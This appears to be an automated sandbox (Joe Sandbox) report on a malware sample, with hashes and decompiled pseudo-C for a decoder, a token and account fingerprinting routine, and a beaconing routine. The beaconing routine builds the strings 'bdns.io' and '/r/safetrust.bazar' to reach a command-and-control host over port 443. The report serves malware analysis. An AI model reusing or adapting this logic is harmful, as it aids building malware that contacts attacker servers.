0x006e37ad
0x006e37b0
0x00000000
0x00000000
0x00000000
0x006e37b0
0x00000000
0x006e3795

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
Instruction ID: 39c1ca47c0106280ffa392a1763035c17a88d0cc84d69100df6aa39ce1aa4f97
Opcode Fuzzy Hash: 941cdd162d245afbbf05162c08f474f524392c1396bed88b72cf0b42da7f5da1
Instruction Fuzzy Hash: B35136B16097D14BE718DA2698997A7F7E79F81304F18857CD48ACB352EA32CA06C345

Uniqueness

Uniqueness Score: -1.00%

Function 006E8230, Relevance: .2, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E006E8230() {
				char _t54;
				intOrPtr _t58;
				signed char _t66;
				void* _t67;
				intOrPtr _t71;
				signed char _t80;
				void* _t81;
				intOrPtr* _t82;
				signed char* _t86;
				intOrPtr _t87;
				void* _t88;
				void* _t91;
				intOrPtr _t94;
				signed char _t95;
				intOrPtr* _t98;
				char _t99;
				signed char _t103;
				char _t104;
				char _t109;
				signed char* _t110;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				char _t118;

				_t98 =  *((intOrPtr*)(_t115 + 0x20));
				_t86 =  *(_t115 + 0x24);
				_t54 =  *_t98;
				_t110 = _t86;
				if(_t54 != 0) {
					_t82 =  *((intOrPtr*)(_t115 + 0x28));
					_t109 = 0;
					do {
						_t118 =  *((char*)(_t98 + _t109 + 1));
						_t109 = _t109 + 1;
					} while (_t118 != 0);
					_t110 = _t86;
					_t87 = 0;
					_t112 = 0;
					while(1) {
						 *((char*)(_t115 + _t112 + 1)) = _t54;
						_t112 = _t112 + 1;
						_t109 = _t109 - 1;
						if(_t112 != 4) {
							goto L17;
						}
						 *((intOrPtr*)(_t115 + 8)) = _t87;
						_t94 =  *_t82;
						_t114 = 0;
						do {
							if(_t94 != 0) {
								_t99 = 0;
								_t71 = _t94;
								while(_t71 != _t71) {
									_t71 =  *((intOrPtr*)(_t82 + _t99 + 1));
									_t99 = _t99 + 1;
									if(_t71 != 0) {
										continue;
									} else {
									}
									goto L13;
								}
								 *((char*)(_t115 + _t114 + 1)) = _t99;
							}
							L13:
							_t114 = _t114 + 1;
						} while (_t114 != 4);
						_t95 =  *(_t115 + 2);
						_t103 = _t95 >> 0x00000004 & 0x00000003 |  *(_t115 + 1) << 0x00000002;
						 *(_t115 + 5) = _t103;
						_t80 = ( *(_t115 + 3) << 0x00000006) +  *((intOrPtr*)(_t115 + 4)) >> 0x00000002 & 0x0000000f | _t95 << 0x00000004;
						 *(_t115 + 6) = _t80;
						 *(_t115 + 7) = _t80;
						_t81 = 0xfffffffe;
						 *_t110 = _t103;
						do {
							_t110[_t81 + 3] =  *((intOrPtr*)(_t115 + _t81 + 8));
							_t81 = _t81 + 1;
						} while (_t81 != 0);
						_t98 =  *((intOrPtr*)(_t115 + 0x20));
						_t87 =  *((intOrPtr*)(_t115 + 8));
						_t110 =  &(_t110[3]);
						_t112 = 0;
						L17:
						if(_t109 != 0) {
							_t87 = _t87 + 1;
							_t54 =  *((intOrPtr*)(_t98 + _t87));
							continue;
						}
						if(_t112 != 0) {
							if(_t112 <= 3) {
								E006F6610(_t115 + _t112 + 1, 0, 4 - _t112);
								_t115 = _t115 + 0xc;
							}
							_t88 = 0;
							 *((char*)(_t115 + 8)) =  *_t82;
							do {
								if( *((char*)(_t115 + 8)) != 0) {
									_t58 =  *((intOrPtr*)(_t115 + 8));
									_t104 = 0;
									while(_t58 != _t58) {
										_t58 =  *((intOrPtr*)(_t82 + _t104 + 1));
										_t104 = _t104 + 1;
										if(_t58 != 0) {
											continue;
										} else {
										}
										goto L28;
									}
									 *((char*)(_t115 + _t88 + 1)) = _t104;
								}
								L28:
								_t88 = _t88 + 1;
							} while (_t88 != 4);
							_t66 =  *(_t115 + 2) >> 0x00000002 >> 0x00000004 & 3 |  *(_t115 + 2) << 0x00000004 |  *(_t115 + 1) << 0x00000002;
							 *(_t115 + 5) = _t66;
							 *(_t115 + 6) = _t66;
							 *(_t115 + 7) = ( *(_t115 + 3) << 6) +  *((intOrPtr*)(_t115 + 4));
							if(_t112 >= 2) {
								_t48 = _t112 - 1; // -1
								_t91 = _t48;
								 *_t110 = _t66;
								if(_t91 != 1) {
									_t113 = _t112 + 0xfffffffe;
									_t67 = 0;
									do {
										_t110[_t67 + 1] =  *((intOrPtr*)(_t115 + _t67 + 6));
										_t67 = _t67 + 1;
									} while (_t113 != _t67);
								}
								_t110 =  &(_t110[_t91]);
							}
						}
						_t86 =  *(_t115 + 0x24);
						goto L35;
					}
				}
				L35:
				 *_t110 = 0;
				return _t110 - _t86;
			}

0x006e8237
0x006e823b
0x006e823f
0x006e8241
0x006e8245
0x006e824b
0x006e824f
0x006e8251
0x006e8251
0x006e8256
0x006e8256
0x006e825b
0x006e825d
0x006e825f
0x006e8267
0x006e8267
0x006e826b
0x006e826c
0x006e8270
0x00000000
0x00000000
0x006e8276
0x006e827a
0x006e827c
0x006e827e
0x006e8280
0x006e8286
0x006e8288
0x006e828a
0x006e828e
0x006e8292
0x006e8295
0x00000000
0x00000000
0x006e8297
0x00000000
0x006e8295
0x006e8299
0x006e8299
0x006e829d
0x006e829d
0x006e829e
0x006e82a3
0x006e82b9
0x006e82bf
0x006e82d2
0x006e82d4
0x006e82d8
0x006e82dc
0x006e82e1
0x006e82e3
0x006e82e7
0x006e82eb
0x006e82eb
0x006e82ee
0x006e82f2
0x006e82f6
0x006e82f9
0x006e82fb
0x006e82fd
0x006e8263
0x006e8264
0x00000000
0x006e8264
0x006e8305
0x006e830e
0x006e831f
0x006e8324
0x006e8324
0x006e8329
0x006e832b
0x006e832f
0x006e8334
0x006e833a
0x006e833e
0x006e8340
0x006e8344
0x006e8348
0x006e834b
0x00000000
0x00000000
0x006e834d
0x00000000
0x006e834b
0x006e834f
0x006e834f
0x006e8353
0x006e8353
0x006e8354
0x006e8388
0x006e838c
0x006e8390
0x006e8394
0x006e8398
0x006e839a
0x006e839a
0x006e839d
0x006e83a2
0x006e83a4
0x006e83a7
0x006e83a9
0x006e83ad
0x006e83b1
0x006e83b2
0x006e83a9
0x006e83b6
0x006e83b6
0x006e8398
0x006e83b8
0x00000000
0x006e83b8
0x006e8267
0x006e83bc
0x006e83bc
0x006e83ca

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
Instruction ID: 3994e9e463bfaaaeb5dbc8afd91b7b2f6e60cf17c575e8aa9feb06b6467ea2b0
Opcode Fuzzy Hash: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
Instruction Fuzzy Hash: 0F51232944D7C15EE3268AA994543EBBFD38BE6304F0CCAACD5DC07743D826880BD792

Uniqueness

Uniqueness Score: -1.00%

Function 006E26D0, Relevance: 15.3, APIs: 10, Instructions: 323
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E006E26D0(intOrPtr* _a4, intOrPtr _a8, signed short* _a12) {
				void* _v16;
				char _v536;
				char _v1044;
				char _v1048;
				char _v1556;
				char _v1560;
				void _v1632;
				intOrPtr _v1636;
				char _v1694;
				signed short _v1696;
				char _v1712;
				struct _FILETIME _v1724;
				short _v1728;
				struct _SID_IDENTIFIER_AUTHORITY _v1732;
				char _v1736;
				char _v1740;
				intOrPtr _v1744;
				signed int _v1748;
				signed int _v1752;
				void* _v1756;
				void* _v1760;
				char _v1764;
				signed int _v1768;
				void* _t95;
				void* _t96;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				FILETIME* _t118;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				signed int* _t133;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				WCHAR* _t143;
				signed int _t147;
				WCHAR* _t154;
				intOrPtr* _t155;
				signed short* _t156;
				signed short* _t164;
				signed int _t165;
				signed short* _t166;
				signed short* _t167;
				signed short* _t168;
				BYTE[6] _t176;
				long _t181;
				intOrPtr _t184;
				signed int* _t185;
				signed short* _t186;
				signed short* _t188;
				void* _t192;
				void* _t193;
				signed int* _t194;
				void* _t195;
				void* _t196;
				struct _SYSTEMTIME* _t197;
				signed int* _t199;
				signed int* _t200;
				WCHAR* _t201;
				signed int _t203;
				signed int* _t205;
				signed int* _t209;
				signed int* _t211;
				signed int* _t212;
				signed int* _t216;
				signed int* _t217;
				signed int* _t221;
				signed int* _t222;
				signed int* _t223;

				_t205 = (_t203 & 0xfffffff8) - 0x6d8;
				_t181 = 0;
				_t176 =  *0x6f9c34; // 0x0
				_v1756 = 0;
				_v1724.dwLowDateTime = 0;
				_v1760 = 0;
				_v1764 = 0x200;
				_v1768 = 0x200;
				_v1728 =  *0x6f9c38 & 0x0000ffff;
				_v1732.Value = _t176;
				if(_a8 == 0) {
					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v1756) == 0 || GetTokenInformation(_v1756, 1,  &_v1632, 0x4c,  &_v1724) == 0) {
						L33:
						_t95 = _v1760;
						if(_t95 != 0) {
							FreeSid(_t95);
						}
						_t96 = _v1756;
						if(_t96 != 0) {
							CloseHandle(_t96);
						}
						goto L37;
					} else {
						_push( &_v1740);
						_push(_t205);
						_push( &_v1560);
						_push( &_v1768);
						_push( &_v1048);
						_push(_v1636);
						L6:
						if(LookupAccountSidW(0, ??, ??, ??, ??, ??, ??) == 0) {
							_t181 = 0;
							L37:
							return _t181;
						}
						_t104 = _v1768;
						_t154 = 0;
						if(_v1768 != 0) {
							_t169 =  *_t205;
							_t154 = 0;
							if( *_t205 != 0) {
								_t143 = E006E3180(_t169 + _t104 + _t169 + _t104 + 4, 0);
								_t222 =  &(_t205[2]);
								_t154 = _t143;
								E006EC400(_t154,  &_v1560,  *_t222 +  *_t222);
								_t223 =  &(_t222[3]);
								_t147 =  *_t223;
								_t201 =  &(_t154[_t147]);
								_t32 = _t147 * 2; // 0x2
								 *_t201 = 0x5c;
								E006EC400(_t154 + _t32 + 2,  &_v1048, _v1768 + _v1768);
								_t205 =  &(_t223[3]);
								 *((short*)(_t201 + 2 + _v1768 * 2)) = 0;
							}
						}
						_t162 =  !=  ? 0x32 : 0x33;
						_v1756 = E006E5B70( !=  ? 0x32 : 0x33);
						_t184 = E006E3180(0x7d00, 0);
						_t109 = E006F4520(_t108, 0x34);
						_t209 =  &(_t205[5]);
						_t192 = _t184 + _t109 * 2;
						_v1744 = _t184;
						if(_a8 == 0) {
							_t193 = _t192 + E006F4520(_t192, 0x36) * 2;
							_t111 = E006F4520(_t193, 0x37);
							_t211 =  &(_t209[4]);
							_t194 = _t193 + _t111 * 2;
							_t112 =  *_t154 & 0x0000ffff;
							if(_t112 == 0) {
								L16:
								_t113 = E006F4520(_t194, 0x38);
								_t212 =  &(_t211[2]);
								_t195 = _t194 + _t113 * 2;
								_push(0x39);
								goto L17;
							}
							_t168 =  &(_t154[1]);
							do {
								 *_t194 = _t112;
								_t194 =  &(_t194[0]);
								_t112 =  *_t168 & 0x0000ffff;
								_t168 =  &(_t168[1]);
							} while (_t112 != 0);
							goto L16;
						} else {
							_t141 = E006F4520(_t192, 0x35);
							_t212 =  &(_t209[2]);
							_t195 = _t192 + _t141 * 2;
							_push(0x3a);
							L17:
							_push(_t195);
							_t196 = _t195 + E006F4520() * 2;
							_t185 = _t196 + E006F4520(_t196, 0x3b) * 2;
							_t197 =  &_v1712;
							GetLocalTime(_t197);
							SystemTimeToFileTime(_t197,  &_v1724);
							_t118 =  &_v1724;
							_t118->dwLowDateTime = _t118->dwLowDateTime + 0x23c34600;
							asm("adc dword [eax+0x4], 0x0");
							FileTimeToSystemTime(_t118, _t197);
							E006F4520( &_v536, 0x3c);
							_v1752 = _t197->wSecond & 0x0000ffff;
							_v1748 = _t197->wDay & 0x0000ffff;
							_push(_v1752);
							_push(_t197->wMinute & 0x0000ffff);
							_push(_t197->wHour & 0x0000ffff);
							_push(_v1748);
							_push(_t197->wMonth & 0x0000ffff);
							E006F68E0( &_v1696, 0x1a,  &_v536, _t197->wYear & 0x0000ffff);
							_t216 =  &(_t212[0xf]);
							_t129 = _v1696 & 0x0000ffff;
							if(_t129 == 0) {
								L20:
								_t130 = E006F4520(_t185, 0x3d);
								_t217 =  &(_t216[2]);
								_t164 = _v1756;
								_t199 = _t185 + _t130 * 2;
								_t131 =  *_t164 & 0x0000ffff;
								if(_t131 == 0) {
									L23:
									_t186 = _a12;
									if(_a8 != 0) {
										L28:
										_t155 = _a4;
										_t132 = E006F4520(_t199, 0x3e);
										_t165 =  *_t186 & 0x0000ffff;
										_t133 = _t199 + _t132 * 2;
										if(_t165 == 0) {
											L31:
											E006F4520(_t133, 0x3f);
											_t181 = 1;
											 *_t155 = _v1744;
											_t136 = _v1756;
											if(_v1756 != 0) {
												E006E91E0(_t136);
											}
											goto L33;
										}
										_t188 =  &(_t186[1]);
										do {
											 *_t133 = _t165;
											_t133 =  &(_t133[0]);
											_t165 =  *_t188 & 0x0000ffff;
											_t188 =  &(_t188[1]);
										} while (_t165 != 0);
										goto L31;
									}
									_t138 = E006F4520(_t199, 0x37);
									_t221 =  &(_t217[2]);
									_t200 = _t199 + _t138 * 2;
									_t139 =  *_t154 & 0x0000ffff;
									if(_t139 == 0) {
										L27:
										_t140 = E006F4520(_t200, 0x38);
										_t217 =  &(_t221[2]);
										_t199 = _t200 + _t140 * 2;
										goto L28;
									}
									_t156 =  &(_t154[1]);
									do {
										 *_t200 = _t139;
										_t200 =  &(_t200[0]);
										_t139 =  *_t156 & 0x0000ffff;
										_t156 =  &(_t156[1]);
									} while (_t139 != 0);
									goto L27;
								}
								_t166 =  &(_t164[1]);
								do {
									 *_t199 = _t131;
									_t199 =  &(_t199[0]);
									_t131 =  *_t166 & 0x0000ffff;
									_t166 =  &(_t166[1]);
								} while (_t131 != 0);
								goto L23;
							}
							_t167 =  &_v1694;
							do {
								 *_t185 = _t129;
								_t185 =  &(_t185[0]);
								_t129 =  *_t167 & 0x0000ffff;
								_t167 =  &(_t167[1]);
							} while (_t129 != 0);
							goto L20;
						}
					}
				}
				_t181 = 0;
				if(AllocateAndInitializeSid( &_v1732, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1760) == 0) {
					goto L33;
				} else {
					_push( &_v1736);
					_push(_t205);
					_push( &_v1556);
					_push( &_v1764);
					_push( &_v1044);
					_push(_v1760);
					goto L6;
				}
			}

0x006e26d9
0x006e26df
0x006e26e8
0x006e26f7
0x006e26fb
0x006e26ff
0x006e2703
0x006e2707
0x006e270a
0x006e270f
0x006e2713
0x006e2773
0x006e2a6c
0x006e2a6c
0x006e2a72
0x006e2a75
0x006e2a75
0x006e2a7b
0x006e2a81
0x006e2a84
0x006e2a84
0x00000000
0x006e279c
0x006e27b4
0x006e27b5
0x006e27b6
0x006e27b7
0x006e27b8
0x006e27b9
0x006e27c0
0x006e27ca
0x006e28a0
0x006e2a8a
0x006e2a93
0x006e2a93
0x006e27d0
0x006e27d6
0x006e27dd
0x006e27df
0x006e27e2
0x006e27e9
0x006e27f4
0x006e27f9
0x006e27fc
0x006e280d
0x006e2812
0x006e2815
0x006e281f
0x006e2822
0x006e2826
0x006e2834
0x006e2839
0x006e2840
0x006e2840
0x006e27e9
0x006e2858
0x006e2864
0x006e2876
0x006e287b
0x006e2880
0x006e2885
0x006e2888
0x006e288c
0x006e28b2
0x006e28b8
0x006e28bd
0x006e28c0
0x006e28c3
0x006e28c9
0x006e28df
0x006e28e2
0x006e28e7
0x006e28ea
0x006e28ed
0x00000000
0x006e28ed
0x006e28cb
0x006e28ce
0x006e28ce
0x006e28d1
0x006e28d4
0x006e28d7
0x006e28da
0x00000000
0x006e288e
0x006e2891
0x006e2896
0x006e2899
0x006e289c
0x006e28ef
0x006e28ef
0x006e28f8
0x006e2906
0x006e2909
0x006e290e
0x006e291a
0x006e2920
0x006e2924
0x006e292a
0x006e2930
0x006e2940
0x006e2954
0x006e295c
0x006e2967
0x006e296b
0x006e296c
0x006e296d
0x006e2971
0x006e2982
0x006e2987
0x006e298e
0x006e2994
0x006e29ab
0x006e29ae
0x006e29b3
0x006e29b6
0x006e29ba
0x006e29bd
0x006e29c3
0x006e29d9
0x006e29d9
0x006e29e0
0x006e2a1a
0x006e2a1a
0x006e2a20
0x006e2a28
0x006e2a2b
0x006e2a31
0x006e2a47
0x006e2a4a
0x006e2a58
0x006e2a59
0x006e2a5b
0x006e2a61
0x006e2a64
0x006e2a69
0x00000000
0x006e2a61
0x006e2a33
0x006e2a36
0x006e2a36
0x006e2a39
0x006e2a3c
0x006e2a3f
0x006e2a42
0x00000000
0x006e2a36
0x006e29e5
0x006e29ea
0x006e29ed
0x006e29f0
0x006e29f6
0x006e2a0c
0x006e2a0f
0x006e2a14
0x006e2a17
0x00000000
0x006e2a17
0x006e29f8
0x006e29fb
0x006e29fb
0x006e29fe
0x006e2a01
0x006e2a04
0x006e2a07
0x00000000
0x006e29fb
0x006e29c5
0x006e29c8
0x006e29c8
0x006e29cb
0x006e29ce
0x006e29d1
0x006e29d4
0x00000000
0x006e29c8
0x006e2996
0x006e299a
0x006e299a
0x006e299d
0x006e29a0
0x006e29a3
0x006e29a6
0x00000000
0x006e299a
0x006e288c
0x006e2773
0x006e2719
0x006e2734
0x00000000
0x006e273a
0x006e2752
0x006e2753
0x006e2754
0x006e2755
0x006e2756
0x006e2757
0x00000000
0x006e2757

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E272C
GetCurrentProcess.KERNEL32 ref: 006E275D
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 006E276B
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 006E278E
LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 006E27C2
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006E290E
SystemTimeToFileTime.KERNEL32(?,?), ref: 006E291A
FileTimeToSystemTime.KERNEL32(?,?), ref: 006E2930

Part of subcall function 006F68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 006F6A15

FreeSid.ADVAPI32(?), ref: 006E2A75
CloseHandle.KERNEL32(?), ref: 006E2A84

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Time$FileProcessSystemToken$AccountAllocateByteCharCloseCurrentFreeHandleInformationInitializeLocalLookupMultiOpenWide
String ID:
API String ID: 348365884-0
Opcode ID: f6a88cd1faeaa45f44d2a4e3120a6c3534ef5a11075a5ed5f543605c325c2c25
Instruction ID: 70ee357c066774062fb7043f14183b1eb7ed2124afb788040dbb5151295a0a7f
Opcode Fuzzy Hash: f6a88cd1faeaa45f44d2a4e3120a6c3534ef5a11075a5ed5f543605c325c2c25
Instruction Fuzzy Hash: 2AB1E4B1901352ABDB20DF15DC41BBB77EEEF90705F00481DFA89A7281EB75AA05C762

Uniqueness

Uniqueness Score: -1.00%

Function 006EAB60, Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 225
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006EAB60(void* __edx, void* __eflags) {
				void* _t42;
				void* _t55;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int* _t72;
				signed int _t73;
				void* _t74;
				void* _t82;
				void* _t88;
				signed int _t90;
				signed int _t91;
				void* _t92;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int* _t106;

				_t88 = __edx;
				_t95 =  &(_t106[9]);
				E006ED8B0( &(_t106[9]));
				_t100 =  &(_t106[4]);
				_t72 =  &(_t106[0xf]);
				_t105 = 0;
				 *_t106 = 0;
				_t106[3] = 0;
				_t106[4] = 0;
				_t106[2] = 0;
				_t106[1] = 0;
				while(1) {
					_t106[0x10] = 0x6f692e;
					_t106[0xf] = 0x736e6462;
					_t42 = E006EC380(_t72, 0xfde9, _t100, 0xffffffff);
					_t106 =  &(_t106[4]);
					if(_t42 == 0) {
						break;
					}
					if(E006EF070(_t95, _t88, _t106[5], 0x1bb) == 0) {
						L6:
						_t105 = _t105 + 1;
						Sleep(0x4e20);
						if(_t105 < 0x1e) {
							continue;
						}
						break;
					}
					_t106[0x13] = 0x7261;
					_t106[0x12] = 0x7a61622e;
					_t106[0x11] = 0x74737572;
					_t106[0x10] = 0x74656661;
					_t106[0xf] = 0x732f722f;
					_t55 = E006EC380(_t72, 0xfde9,  &(_t106[3]), 0xffffffff);
					_t106 =  &(_t106[4]);
					if(_t55 == 0) {
						break;
					}
					if(E006E5A50(_t95, _t106[3],  &(_t106[7])) == 0 || _t106[7] != 0xc8) {
						goto L6;
					} else {
						_t59 = E006E7F10( &(_t106[9]),  &(_t106[1]),  &(_t106[8]));
						__eflags = _t59;
						if(_t59 == 0) {
							break;
						}
						_t90 = _t106[8];
						__eflags = _t90 - 7;
						if(_t90 < 7) {
							break;
						}
						_t60 = _t106[1];
						__eflags = _t90;
						_t82 = _t60 + _t90;
						if(_t90 <= 0) {
							L21:
							__eflags = _t60 - _t82;
							_t91 = _t60;
							if(_t60 >= _t82) {
								L26:
								_t92 = _t91 - _t60;
								__eflags = _t92 - 7 - 8;
								if(_t92 - 7 > 8) {
									break;
								}
								_t61 = E006EC380(_t60, 0,  &(_t106[3]), _t92);
								_t106 =  &(_t106[4]);
								_t73 = _t106[0x2d];
								__eflags = _t61;
								if(_t61 == 0) {
									break;
								}
								_t101 = 0;
								__eflags = 0;
								while(1) {
									_t62 = E006F6BD0(_t73, _t92, __eflags, _t106[4], 0x1bb);
									__eflags = _t62;
									if(_t62 != 0) {
										break;
									}
									_t101 = _t101 + 1;
									Sleep(0x7530);
									__eflags = _t101 - 0x14;
									if(__eflags < 0) {
										continue;
									}
									__eflags = _t101 - 0x14;
									 *_t106 = 0;
									if(_t101 == 0x14) {
										goto L7;
									}
									break;
								}
								_t102 =  &(_t106[6]);
								_t96 = 0;
								__eflags = 0;
								_t106[6] = 0;
								while(1) {
									_t63 = E006E5960(__eflags, _t73, _t102);
									_t106 =  &(_t106[2]);
									__eflags = _t63;
									if(_t63 == 0) {
										break;
									}
									_t96 = _t96 + 1;
									Sleep(0x7530);
									__eflags = _t96 - 0x14;
									if(__eflags < 0) {
										continue;
									}
									if(__eflags != 0) {
										L39:
										_t103 =  &(_t106[5]);
										_t98 = 0;
										__eflags = 0;
										_t106[5] = 0;
										while(1) {
											_t64 = E006E3C40(_t73, _t103);
											_t106 =  &(_t106[2]);
											__eflags = _t64;
											if(_t64 == 0) {
												break;
											}
											_t98 = _t98 + 1;
											Sleep(0x7530);
											__eflags = _t98 - 0x14;
											if(__eflags < 0) {
												continue;
											}
											if(__eflags != 0) {
												L46:
												_t104 = 0;
												__eflags = 0;
												while(1) {
													_t65 = E006E9060(_t73, 0x6f9ac8);
													_t106 =  &(_t106[2]);
													__eflags = _t65;
													if(_t65 != 0) {
														break;
													}
													_t104 = _t104 + 1;
													Sleep(0x7530);
													__eflags = _t104 - 0x64;
													if(_t104 < 0x64) {
														continue;
													}
													break;
												}
												__eflags = _t104 - 0x64;
												 *_t106 = 0 | _t104 != 0x00000064;
												goto L7;
											}
											L43:
											 *_t106 = 0;
											goto L7;
										}
										_t99 = _t106[5];
										__eflags = _t99;
										if(_t99 != 0) {
											E006E9510(_t99);
											L006F7400(_t99);
											_t106 =  &(_t106[1]);
										}
										goto L46;
									}
									goto L43;
								}
								_t97 = _t106[6];
								__eflags = _t97;
								if(_t97 != 0) {
									L006F1F70(_t63);
									L006F7400(_t97);
									_t106 =  &(_t106[1]);
								}
								goto L39;
							}
							_t91 = _t60;
							do {
								_t74 =  *_t91;
								__eflags = _t74 - 0x2e;
								if(_t74 == 0x2e) {
									goto L25;
								}
								__eflags = _t74 + 0xd0 - 9;
								if(_t74 + 0xd0 > 9) {
									goto L26;
								}
								L25:
								_t91 = _t91 + 1;
								__eflags = _t91 - _t82;
							} while (_t91 < _t82);
							goto L26;
						} else {
							goto L19;
						}
						while(1) {
							L19:
							__eflags =  *_t60 + 0xd0 - 0xa;
							if( *_t60 + 0xd0 < 0xa) {
								goto L21;
							}
							_t60 = _t60 + 1;
							__eflags = _t60 - _t82;
							if(_t60 < _t82) {
								continue;
							}
							goto L21;
						}
						goto L21;
					}
				}
				L7:
				_t43 = _t106[3];
				if(_t106[3] != 0) {
					E006E91E0(_t43);
					_t106 =  &(_t106[1]);
				}
				_t44 = _t106[4];
				if(_t106[4] != 0) {
					E006E91E0(_t44);
					_t106 =  &(_t106[1]);
				}
				_t45 = _t106[2];
				if(_t106[2] != 0) {
					E006E91E0(_t45);
					_t106 =  &(_t106[1]);
				}
				_t46 = _t106[1];
				if(_t106[1] != 0) {
					E006E91E0(_t46);
					_t106 =  &(_t106[1]);
				}
				E006F19C0( &(_t106[9]));
				return  *_t106;
			}

0x006eab60
0x006eab6a
0x006eab70
0x006eab77
0x006eab7f
0x006eab83
0x006eab85
0x006eab8c
0x006eab90
0x006eab92
0x006eab94
0x006eab98
0x006eab98
0x006eaba0
0x006eabb1
0x006eabb6
0x006eabbb
0x00000000
0x00000000
0x006eabd3
0x006eac34
0x006eac34
0x006eac3a
0x006eac43
0x00000000
0x00000000
0x00000000
0x006eac43
0x006eabd5
0x006eabdd
0x006eabe5
0x006eabed
0x006eabf5
0x006eac0a
0x006eac0f
0x006eac14
0x00000000
0x00000000
0x006eac28
0x00000000
0x006eaca4
0x006eacb2
0x006eacb7
0x006eacb9
0x00000000
0x00000000
0x006eacbb
0x006eacbf
0x006eacc2
0x00000000
0x00000000
0x006eacc4
0x006eacc8
0x006eacca
0x006eaccd
0x006eacde
0x006eacde
0x006eace0
0x006eace2
0x006eacfa
0x006eacfa
0x006eacff
0x006ead02
0x00000000
0x00000000
0x006ead11
0x006ead16
0x006ead19
0x006ead20
0x006ead22
0x00000000
0x00000000
0x006ead28
0x006ead28
0x006ead2a
0x006ead35
0x006ead3a
0x006ead3c
0x00000000
0x00000000
0x006ead3e
0x006ead44
0x006ead4a
0x006ead4d
0x00000000
0x00000000
0x006ead4f
0x006ead52
0x006ead59
0x00000000
0x00000000
0x00000000
0x006ead59
0x006ead5f
0x006ead63
0x006ead63
0x006ead65
0x006ead6b
0x006ead6d
0x006ead72
0x006ead75
0x006ead77
0x00000000
0x00000000
0x006ead79
0x006ead7f
0x006ead85
0x006ead88
0x00000000
0x00000000
0x006ead8a
0x006eada6
0x006eada6
0x006eadaa
0x006eadaa
0x006eadac
0x006eadb2
0x006eadb4
0x006eadb9
0x006eadbc
0x006eadbe
0x00000000
0x00000000
0x006eadc0
0x006eadc6
0x006eadcc
0x006eadcf
0x00000000
0x00000000
0x006eadd1
0x006eadf7
0x006eadf7
0x006eadf7
0x006eadf9
0x006eadff
0x006eae04
0x006eae07
0x006eae09
0x00000000
0x00000000
0x006eae0b
0x006eae11
0x006eae17
0x006eae1a
0x00000000
0x00000000
0x00000000
0x006eae1a
0x006eae1e
0x006eae24
0x00000000
0x006eae24
0x006eadd3
0x006eadd3
0x00000000
0x006eadd3
0x006eaddf
0x006eade3
0x006eade5
0x006eade9
0x006eadef
0x006eadf4
0x006eadf4
0x00000000
0x006eade5
0x00000000
0x006ead8c
0x006ead8e
0x006ead92
0x006ead94
0x006ead98
0x006ead9e
0x006eada3
0x006eada3
0x00000000
0x006ead94
0x006eace4
0x006eace6
0x006eace6
0x006eace8
0x006eaceb
0x00000000
0x00000000
0x006eacf0
0x006eacf3
0x00000000
0x00000000
0x006eacf5
0x006eacf5
0x006eacf6
0x006eacf6
0x00000000
0x00000000
0x00000000
0x00000000
0x006eaccf
0x006eaccf
0x006eacd4
0x006eacd7
0x00000000
0x00000000
0x006eacd9
0x006eacda
0x006eacdc
0x00000000
0x00000000
0x00000000
0x006eacdc
0x00000000
0x006eaccf
0x006eac28
0x006eac49
0x006eac49
0x006eac4f
0x006eac52
0x006eac57
0x006eac57
0x006eac5a
0x006eac60
0x006eac63
0x006eac68
0x006eac68
0x006eac6b
0x006eac71
0x006eac74
0x006eac79
0x006eac79
0x006eac7c
0x006eac82
0x006eac85
0x006eac8a
0x006eac8a
0x006eac91
0x006eaca3
